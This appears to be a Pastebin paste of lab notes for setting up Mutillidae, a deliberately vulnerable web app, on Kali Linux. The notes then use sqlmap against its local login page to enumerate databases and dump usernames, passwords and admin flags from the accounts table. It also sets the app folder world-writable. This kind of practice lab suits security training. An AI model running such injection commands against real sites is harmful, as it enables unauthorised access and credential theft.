Advertisement
Guest User

Untitled

a guest
Nov 15th, 2016
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.65 KB | None | 0 0
  1. http://sourceforge.net/projects/mutillidae/
  2. chmod -R 0777 /var/www/mutillidae
  3. Run Apache, Go to Application → Kali Linux → System Service → HTTP → apache2start
  4. Run My SQL, Go to Application → Kali Linux → System Service → MySQL → mysql start
  5. mysql –u root –p and Press enter
  6. create database mutillidae;
  7. Type exit and Press enter
  8. 127.0.0.1/mutillidae
  9. Reset DB
  10.  
  11. sqlmap -u "http://localhost/mutillidae/index.php?page=user-info.php&username=user1&password=password1&user-info-php-submit-button=View+Account+Details" -p username,password
  12. --current-user
  13. --dbs
  14. -D nowasp --tables
  15. -T accounts --columns
  16. -C is_admin,username,password --dump
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement